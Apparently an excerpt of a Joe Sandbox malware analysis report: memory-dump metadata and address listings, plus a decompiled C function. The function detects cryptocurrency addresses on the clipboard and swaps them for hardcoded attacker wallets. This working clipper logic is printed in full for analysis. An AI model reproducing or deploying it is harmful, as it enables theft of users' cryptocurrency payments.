                                                                                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                                                                                  0x004070f5
                                                                                                                                                                                                                                                                  0x004070f8
                                                                                                                                                                                                                                                                  0x004070fb
                                                                                                                                                                                                                                                                  0x0040711a
                                                                                                                                                                                                                                                                  0x0040711d
                                                                                                                                                                                                                                                                  0x00407128
                                                                                                                                                                                                                                                                  0x00407133
                                                                                                                                                                                                                                                                  0x00407136
                                                                                                                                                                                                                                                                  0x00407141
                                                                                                                                                                                                                                                                  0x0040714c
                                                                                                                                                                                                                                                                  0x0040714f
                                                                                                                                                                                                                                                                  0x00407152
                                                                                                                                                                                                                                                                  0x00407156
                                                                                                                                                                                                                                                                  0x00407162
                                                                                                                                                                                                                                                                  0x00407173
                                                                                                                                                                                                                                                                  0x00407192
                                                                                                                                                                                                                                                                  0x00407195
                                                                                                                                                                                                                                                                  0x0040719e
                                                                                                                                                                                                                                                                  0x0040635f
                                                                                                                                                                                                                                                                  0x0040635f
                                                                                                                                                                                                                                                                  0x004071ab

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                  • String ID: Y
                                                                                                                                                                                                                                                                  • API String ID: 673498613-3233089245
                                                                                                                                                                                                                                                                  • Opcode ID: 07bdde0e49778be88f21af2a97937af459bbcb02cf1de461960e85efc5d88d4b
                                                                                                                                                                                                                                                                  • Instruction ID: 423f4ea252a39df0aa3943fb212da4289abc5590b266f572e896fa5a384f9de2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07bdde0e49778be88f21af2a97937af459bbcb02cf1de461960e85efc5d88d4b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18D21C79D11619EFCB54CF99C18099EFBF1FF88320F66859A9845AB305C630BA91DF80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                                                                                  			E00403480(WCHAR* _a4) {
                                                                                                                                                                                                                                                                  				int _v8;
                                                                                                                                                                                                                                                                  				WCHAR* _v12;
                                                                                                                                                                                                                                                                  				int _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                                                                                                                  				signed int _t244;
                                                                                                                                                                                                                                                                  				signed int _t247;
                                                                                                                                                                                                                                                                  				void* _t404;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				_v8 = lstrlenW(_a4);
                                                                                                                                                                                                                                                                  				if(( *_a4 & 0x0000ffff) != 0x31 && ( *_a4 & 0x0000ffff) != 0x33 && ( *_a4 & 0x0000ffff) != 0x58 && ( *_a4 & 0x0000ffff) != 0x44 && ( *_a4 & 0x0000ffff) != 0x30 && ( *_a4 & 0x0000ffff) != 0x4c && ( *_a4 & 0x0000ffff) != 0x72 && ( *_a4 & 0x0000ffff) != 0x6c && ( *_a4 & 0x0000ffff) != 0x54 && ( *_a4 & 0x0000ffff) != 0x74 && ( *_a4 & 0x0000ffff) != 0x68 && ( *_a4 & 0x0000ffff) != 0x51 && ( *_a4 & 0x0000ffff) != 0x52 && ( *_a4 & 0x0000ffff) != 0x4e && ( *_a4 & 0x0000ffff) != 0x41 && ( *_a4 & 0x0000ffff) != 0x53 && ( *_a4 & 0x0000ffff) != 0x7a && ( *_a4 & 0x0000ffff) != 0x73 && ( *_a4 & 0x0000ffff) != 0x71 && ( *_a4 & 0x0000ffff) != 0x63 && ( *_a4 & 0x0000ffff) != 0x34 && ( *_a4 & 0x0000ffff) != 0x38 && ( *_a4 & 0x0000ffff) != 0x61 && ( *_a4 & 0x0000ffff) != 0x46 && ( *_a4 & 0x0000ffff) != 0x47 && ( *_a4 & 0x0000ffff) != 0x62 && ( *_a4 & 0x0000ffff) != 0x55 && ( *_a4 & 0x0000ffff) != 0x45 && ( *_a4 & 0x0000ffff) != 0x42) {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(( *_a4 & 0x0000ffff) != 0x34) {
                                                                                                                                                                                                                                                                  					if(( *_a4 & 0x0000ffff) != 0x38) {
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) != 0x72) {
                                                                                                                                                                                                                                                                  							if(StrStrW(_a4, L"bitcoincash:") == 0) {
                                                                                                                                                                                                                                                                  								if(StrStrW(_a4, L"cosmos") == 0) {
                                                                                                                                                                                                                                                                  									if(StrStrW(_a4, L"addr") == 0) {
                                                                                                                                                                                                                                                                  										if(( *_a4 & 0x0000ffff) == 0x55 || ( *_a4 & 0x0000ffff) == 0x45 || ( *_a4 & 0x0000ffff) == 0x42) {
                                                                                                                                                                                                                                                                  											if(_v8 == 9) {
                                                                                                                                                                                                                                                                  												goto L69;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											return 0;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											if(_v8 < 0x15 || _v8 > 0x38) {
                                                                                                                                                                                                                                                                  												return 0;
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												goto L69;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									if(_v8 < 0x62 || _v8 > 0x69) {
                                                                                                                                                                                                                                                                  										return 0;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										goto L69;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								if(_v8 < 0x2a || _v8 > 0x30) {
                                                                                                                                                                                                                                                                  									return 0;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									goto L69;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if(_v8 < 0x32 || _v8 > 0x38) {
                                                                                                                                                                                                                                                                  								return 0;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L69;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_v8 < 0x19 || _v8 > 0x23) {
                                                                                                                                                                                                                                                                  							return 0;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							goto L69;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_v8 < 0x5f || _v8 > 0x6a) {
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L69;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					if(_v8 < 0x5f || _v8 > 0x6a) {
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L69:
                                                                                                                                                                                                                                                                  					if(StrStrW(_a4, L"bitcoincash:") != 0) {
                                                                                                                                                                                                                                                                  						L82:
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x31) {
                                                                                                                                                                                                                                                                  							if(_v8 != 0x30) {
                                                                                                                                                                                                                                                                  								_v12 = "1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD";
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v12 = "12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc";
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x33) {
                                                                                                                                                                                                                                                                  							if((_a4[1] & 0x0000ffff) != 0x50) {
                                                                                                                                                                                                                                                                  								_v12 = "3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz";
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v12 = "3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg";
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x6c) {
                                                                                                                                                                                                                                                                  							_v12 = "lskbjrchofkmqtugfw28ot7jzv96u75xzyb5bvoop";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x71) {
                                                                                                                                                                                                                                                                  							_v12 = "qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x58) {
                                                                                                                                                                                                                                                                  							_v12 = "XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x44) {
                                                                                                                                                                                                                                                                  							_v12 = "DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x30) {
                                                                                                                                                                                                                                                                  							_v12 = "0xb899fC445a1b61Cdd62266795193203aa72351fE";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x4c) {
                                                                                                                                                                                                                                                                  							_v12 = "LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x72) {
                                                                                                                                                                                                                                                                  							_v12 = "r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x54) {
                                                                                                                                                                                                                                                                  							_v12 = "TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x74) {
                                                                                                                                                                                                                                                                  							if((_a4[1] & 0x0000ffff) == 0x31 || (_a4[1] & 0x0000ffff) == 0x32) {
                                                                                                                                                                                                                                                                  								_v12 = "t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy";
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								if((_a4[1] & 0x0000ffff) != 0x65 || (_a4[2] & 0x0000ffff) != 0x72 || (_a4[3] & 0x0000ffff) != 0x72 || (_a4[4] & 0x0000ffff) != 0x61) {
                                                                                                                                                                                                                                                                  									_v12 = "tz1fpBZAB1jz7RsefBjT94VR3h5VzL4akg6L";
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_v12 = "terra1smy8jurjwm790qrt5z3qrsyrx9a3lcwehvzmw3";
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x68) {
                                                                                                                                                                                                                                                                  							_v12 = "hxc65003fbd738014cf286edf92f9ddac689ec4de5";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x51) {
                                                                                                                                                                                                                                                                  							_v12 = "QYHny85SWYTLcZFFNNoVovyN15eNbwZdW6";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x52) {
                                                                                                                                                                                                                                                                  							_v12 = "RRQ9QGcqnHEqJAbcEjs9X3EYsEfXrZPvEi";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x4e) {
                                                                                                                                                                                                                                                                  							_v12 = "NC7YTU5BSOVDYRUPWA3KUXP437AEZ7JNE2H3EYGI";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x41) {
                                                                                                                                                                                                                                                                  							_v12 = "AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x53) {
                                                                                                                                                                                                                                                                  							_v12 = "SNCjaBTsinQUDTjBvBoDLVm2AnN2qXeMCs";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x7a) {
                                                                                                                                                                                                                                                                  							_v12 = "zil14rxudm29xzmu9cyk0mcwvrlxm086evuawjy2ev";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x73) {
                                                                                                                                                                                                                                                                  							_v12 = "s1dSgik6QuCDrRnw9yvtrLCvRLDemi2juJe";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(StrStrW(_a4, L"bitcoincash") != 0) {
                                                                                                                                                                                                                                                                  							_v12 = "bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(StrStrW(_a4, L"cosmos") != 0) {
                                                                                                                                                                                                                                                                  							_v12 = "cosmos156h8kejuwm3n7ywpwajplfzahgum8lenvkezny";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x34) {
                                                                                                                                                                                                                                                                  							_v12 = "43ABGVDKXksdy7UTP8aHqkRf4xAVDmKKXBYDRevAadwaLJhHzH4ubZHGLjVpLc5ZWk7TVmHbHHAWUBF78mx1YG4eNbww6fr";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x38) {
                                                                                                                                                                                                                                                                  							_v12 = "8BxS6BtEznQUg2ThyjoKsgNzBLQiW43wJ7FMedwb8P29YKiPvrD6PWrSMcAaRjMnXkhnYjgj8dX9hcL2DRejE4vR6oLP2ou";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(StrStrW(_a4, L"addr") != 0) {
                                                                                                                                                                                                                                                                  							_v12 = "addr1q8ujsfumgrpjvp2v6s3cfndz7yqf7cgpnjfpdlqxfphwfa0e9qneksxrycz5e4prsnx69ugqnassr8yjzm7qvjrwun6s6dfsrt";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x61 && (_a4[1] & 0x0000ffff) != 0x64) {
                                                                                                                                                                                                                                                                  							_v12 = "aPSfmf1H5DNksgcUMV39NPJcSj832L2okm";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x46) {
                                                                                                                                                                                                                                                                  							_v12 = "FeGdLZrnbVLsmiY9tZ4ssoRjdLDxiigQBL";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x47) {
                                                                                                                                                                                                                                                                  							if(_v8 != 0x38) {
                                                                                                                                                                                                                                                                  								_v12 = "GSdrN7W3GsqsxqaXg4x9k5C8cf1uJeoFFg";
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v12 = "GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY";
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x62) {
                                                                                                                                                                                                                                                                  							if(StrStrW(_a4, L"bnb") != 0) {
                                                                                                                                                                                                                                                                  								_v12 = "bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky";
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if(StrStrW(_a4, L"band") != 0) {
                                                                                                                                                                                                                                                                  								_v12 = "band1f2nuxcxahrph4n4gpy4lndsp5q342fz0yjh945";
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if(StrStrW(_a4, L"bc1") != 0) {
                                                                                                                                                                                                                                                                  								_v12 = "bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v";
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x55) {
                                                                                                                                                                                                                                                                  							_v12 = "U33390790";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x45) {
                                                                                                                                                                                                                                                                  							_v12 = "E36963824";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) == 0x42) {
                                                                                                                                                                                                                                                                  							_v12 = "B36461211";
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v16 = lstrlenA(_v12);
                                                                                                                                                                                                                                                                  						if(_v16 != 0) {
                                                                                                                                                                                                                                                                  							_v24 = GlobalAlloc(0x2002, _v16 + 1);
                                                                                                                                                                                                                                                                  							if(_v24 != 0) {
                                                                                                                                                                                                                                                                  								_v20 = GlobalLock(_v24);
                                                                                                                                                                                                                                                                  								if(_v20 != 0) {
                                                                                                                                                                                                                                                                  									memcpy(_v20, _v12, _v16 + 1);
                                                                                                                                                                                                                                                                  									GlobalUnlock(_v24);
                                                                                                                                                                                                                                                                  									if(OpenClipboard(0) != 0) {
                                                                                                                                                                                                                                                                  										EmptyClipboard();
                                                                                                                                                                                                                                                                  										SetClipboardData(1, _v24);
                                                                                                                                                                                                                                                                  										CloseClipboard();
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						return 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v28 = 0;
                                                                                                                                                                                                                                                                  					while(_v28 < _v8) {
                                                                                                                                                                                                                                                                  						if(( *_a4 & 0x0000ffff) != 0x31 || (_a4[_v28] & 0x0000ffff) != 0x4f && (_a4[_v28] & 0x0000ffff) != 0x49 && (_a4[_v28] & 0x0000ffff) != 0x6c) {
                                                                                                                                                                                                                                                                  							_t244 = _a4[_v28] & 0x0000ffff;
                                                                                                                                                                                                                                                                  							_push(_t244);
                                                                                                                                                                                                                                                                  							L0040E9D8();
                                                                                                                                                                                                                                                                  							_t404 = _t404 + 4;
                                                                                                                                                                                                                                                                  							if(_t244 != 0) {
                                                                                                                                                                                                                                                                  								L81:
                                                                                                                                                                                                                                                                  								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t247 = _a4[_v28] & 0x0000ffff;
                                                                                                                                                                                                                                                                  							_push(_t247);
                                                                                                                                                                                                                                                                  							L0040E9DE();
                                                                                                                                                                                                                                                                  							_t404 = _t404 + 4;
                                                                                                                                                                                                                                                                  							if(_t247 != 0) {
                                                                                                                                                                                                                                                                  								goto L81;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							return 0;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							return 0;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L82;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x00403486
                                                                                                                                                                                                                                                                  0x0040348d
                                                                                                                                                                                                                                                                  0x0040349e
                                                                                                                                                                                                                                                                  0x004034aa
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403628
                                                                                                                                                                                                                                                                  0x00403638
                                                                                                                                                                                                                                                                  0x0040365b
                                                                                                                                                                                                                                                                  0x0040367e
                                                                                                                                                                                                                                                                  0x004036a9
                                                                                                                                                                                                                                                                  0x004036d4
                                                                                                                                                                                                                                                                  0x004036fc
                                                                                                                                                                                                                                                                  0x0040371c
                                                                                                                                                                                                                                                                  0x00403738
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403741
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403743
                                                                                                                                                                                                                                                                  0x00403747
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403747
                                                                                                                                                                                                                                                                  0x0040371c
                                                                                                                                                                                                                                                                  0x00403702
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403711
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403711
                                                                                                                                                                                                                                                                  0x00403702
                                                                                                                                                                                                                                                                  0x004036da
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004036e9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004036e9
                                                                                                                                                                                                                                                                  0x004036da
                                                                                                                                                                                                                                                                  0x004036af
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004036be
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004036be
                                                                                                                                                                                                                                                                  0x004036af
                                                                                                                                                                                                                                                                  0x00403684
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403693
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403693
                                                                                                                                                                                                                                                                  0x00403684
                                                                                                                                                                                                                                                                  0x00403661
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403669
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040363a
                                                                                                                                                                                                                                                                  0x0040363e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403646
                                                                                                                                                                                                                                                                  0x00403756
                                                                                                                                                                                                                                                                  0x00403767
                                                                                                                                                                                                                                                                  0x00403800
                                                                                                                                                                                                                                                                  0x00403809
                                                                                                                                                                                                                                                                  0x0040380f
                                                                                                                                                                                                                                                                  0x0040381a
                                                                                                                                                                                                                                                                  0x00403811
                                                                                                                                                                                                                                                                  0x00403811
                                                                                                                                                                                                                                                                  0x00403811
                                                                                                                                                                                                                                                                  0x0040380f
                                                                                                                                                                                                                                                                  0x0040382a
                                                                                                                                                                                                                                                                  0x00403836
                                                                                                                                                                                                                                                                  0x00403841
                                                                                                                                                                                                                                                                  0x00403838
                                                                                                                                                                                                                                                                  0x00403838
                                                                                                                                                                                                                                                                  0x00403838
                                                                                                                                                                                                                                                                  0x00403836
                                                                                                                                                                                                                                                                  0x00403851
                                                                                                                                                                                                                                                                  0x00403853
                                                                                                                                                                                                                                                                  0x00403853
                                                                                                                                                                                                                                                                  0x00403863
                                                                                                                                                                                                                                                                  0x00403865
                                                                                                                                                                                                                                                                  0x00403865
                                                                                                                                                                                                                                                                  0x00403875
                                                                                                                                                                                                                                                                  0x00403877
                                                                                                                                                                                                                                                                  0x00403877
                                                                                                                                                                                                                                                                  0x00403887
                                                                                                                                                                                                                                                                  0x00403889
                                                                                                                                                                                                                                                                  0x00403889
                                                                                                                                                                                                                                                                  0x00403899
                                                                                                                                                                                                                                                                  0x0040389b
                                                                                                                                                                                                                                                                  0x0040389b
                                                                                                                                                                                                                                                                  0x004038ab
                                                                                                                                                                                                                                                                  0x004038ad
                                                                                                                                                                                                                                                                  0x004038ad
                                                                                                                                                                                                                                                                  0x004038bd
                                                                                                                                                                                                                                                                  0x004038bf
                                                                                                                                                                                                                                                                  0x004038bf
                                                                                                                                                                                                                                                                  0x004038cf
                                                                                                                                                                                                                                                                  0x004038d1
                                                                                                                                                                                                                                                                  0x004038d1
                                                                                                                                                                                                                                                                  0x004038e1
                                                                                                                                                                                                                                                                  0x004038ed
                                                                                                                                                                                                                                                                  0x004038fb
                                                                                                                                                                                                                                                                  0x00403904
                                                                                                                                                                                                                                                                  0x0040390e
                                                                                                                                                                                                                                                                  0x0040393d
                                                                                                                                                                                                                                                                  0x00403934
                                                                                                                                                                                                                                                                  0x00403934
                                                                                                                                                                                                                                                                  0x00403934
                                                                                                                                                                                                                                                                  0x0040390e
                                                                                                                                                                                                                                                                  0x004038ed
                                                                                                                                                                                                                                                                  0x0040394d
                                                                                                                                                                                                                                                                  0x0040394f
                                                                                                                                                                                                                                                                  0x0040394f
                                                                                                                                                                                                                                                                  0x0040395f
                                                                                                                                                                                                                                                                  0x00403961
                                                                                                                                                                                                                                                                  0x00403961
                                                                                                                                                                                                                                                                  0x00403971
                                                                                                                                                                                                                                                                  0x00403973
                                                                                                                                                                                                                                                                  0x00403973
                                                                                                                                                                                                                                                                  0x00403983
                                                                                                                                                                                                                                                                  0x00403985
                                                                                                                                                                                                                                                                  0x00403985
                                                                                                                                                                                                                                                                  0x00403995
                                                                                                                                                                                                                                                                  0x00403997
                                                                                                                                                                                                                                                                  0x00403997
                                                                                                                                                                                                                                                                  0x004039a7
                                                                                                                                                                                                                                                                  0x004039a9
                                                                                                                                                                                                                                                                  0x004039a9
                                                                                                                                                                                                                                                                  0x004039b9
                                                                                                                                                                                                                                                                  0x004039bb
                                                                                                                                                                                                                                                                  0x004039bb
                                                                                                                                                                                                                                                                  0x004039cb
                                                                                                                                                                                                                                                                  0x004039cd
                                                                                                                                                                                                                                                                  0x004039cd
                                                                                                                                                                                                                                                                  0x004039e5
                                                                                                                                                                                                                                                                  0x004039e7
                                                                                                                                                                                                                                                                  0x004039e7
                                                                                                                                                                                                                                                                  0x004039ff
                                                                                                                                                                                                                                                                  0x00403a01
                                                                                                                                                                                                                                                                  0x00403a01
                                                                                                                                                                                                                                                                  0x00403a11
                                                                                                                                                                                                                                                                  0x00403a13
                                                                                                                                                                                                                                                                  0x00403a13
                                                                                                                                                                                                                                                                  0x00403a23
                                                                                                                                                                                                                                                                  0x00403a25
                                                                                                                                                                                                                                                                  0x00403a25
                                                                                                                                                                                                                                                                  0x00403a3d
                                                                                                                                                                                                                                                                  0x00403a3f
                                                                                                                                                                                                                                                                  0x00403a3f
                                                                                                                                                                                                                                                                  0x00403a4f
                                                                                                                                                                                                                                                                  0x00403a5d
                                                                                                                                                                                                                                                                  0x00403a5d
                                                                                                                                                                                                                                                                  0x00403a6d
                                                                                                                                                                                                                                                                  0x00403a6f
                                                                                                                                                                                                                                                                  0x00403a6f
                                                                                                                                                                                                                                                                  0x00403a7f
                                                                                                                                                                                                                                                                  0x00403a85
                                                                                                                                                                                                                                                                  0x00403a90
                                                                                                                                                                                                                                                                  0x00403a87
                                                                                                                                                                                                                                                                  0x00403a87
                                                                                                                                                                                                                                                                  0x00403a87
                                                                                                                                                                                                                                                                  0x00403a85
                                                                                                                                                                                                                                                                  0x00403aa0
                                                                                                                                                                                                                                                                  0x00403ab3
                                                                                                                                                                                                                                                                  0x00403ab5
                                                                                                                                                                                                                                                                  0x00403ab5
                                                                                                                                                                                                                                                                  0x00403acd
                                                                                                                                                                                                                                                                  0x00403acf
                                                                                                                                                                                                                                                                  0x00403acf
                                                                                                                                                                                                                                                                  0x00403ae7
                                                                                                                                                                                                                                                                  0x00403ae9
                                                                                                                                                                                                                                                                  0x00403ae9
                                                                                                                                                                                                                                                                  0x00403ae7
                                                                                                                                                                                                                                                                  0x00403af9
                                                                                                                                                                                                                                                                  0x00403afb
                                                                                                                                                                                                                                                                  0x00403afb
                                                                                                                                                                                                                                                                  0x00403b0b
                                                                                                                                                                                                                                                                  0x00403b0d
                                                                                                                                                                                                                                                                  0x00403b0d
                                                                                                                                                                                                                                                                  0x00403b1d
                                                                                                                                                                                                                                                                  0x00403b1f
                                                                                                                                                                                                                                                                  0x00403b1f
                                                                                                                                                                                                                                                                  0x00403b30
                                                                                                                                                                                                                                                                  0x00403b37
                                                                                                                                                                                                                                                                  0x00403b4b
                                                                                                                                                                                                                                                                  0x00403b52
                                                                                                                                                                                                                                                                  0x00403b5e
                                                                                                                                                                                                                                                                  0x00403b65
